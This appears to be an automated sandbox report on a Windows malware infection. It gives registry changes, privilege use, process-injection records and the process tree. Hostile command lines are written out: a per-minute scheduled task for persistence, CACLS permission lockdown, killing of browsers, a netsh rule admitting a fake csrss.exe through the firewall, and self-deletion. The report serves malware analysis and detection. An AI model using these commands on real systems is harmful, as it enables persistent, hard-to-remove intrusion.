Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2872 = "Magallanes Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ugrceei N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3984 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 3984 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\aafg31.exe
PID 3984 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 3984 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 3984 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
PID 3984 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 3984 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\fileexe.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe
PID 1752 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 1752 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 1752 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\oldplayer.exe C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
PID 2704 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2704 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2704 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 4468 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4416 wrote to memory of 2540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2704 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 2704 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 2704 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe
PID 448 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 448 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 448 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 448 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\aafg31.exe C:\Windows\SYSTEM32\taskkill.exe
PID 2704 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 2704 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 2704 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 3840 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe
PID 2704 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe
PID 2704 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe
PID 2704 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe
PID 4924 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4924 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4924 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1460 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 1460 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe C:\Windows\SysWOW64\cmd.exe
PID 228 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 228 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 228 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1020 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\fileexe.exe

"C:\Users\Admin\AppData\Local\Temp\fileexe.exe"

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

"C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM chrome.exe /F

C:\Windows\SYSTEM32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1460 -ip 1460

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 628

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 1432

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

"C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

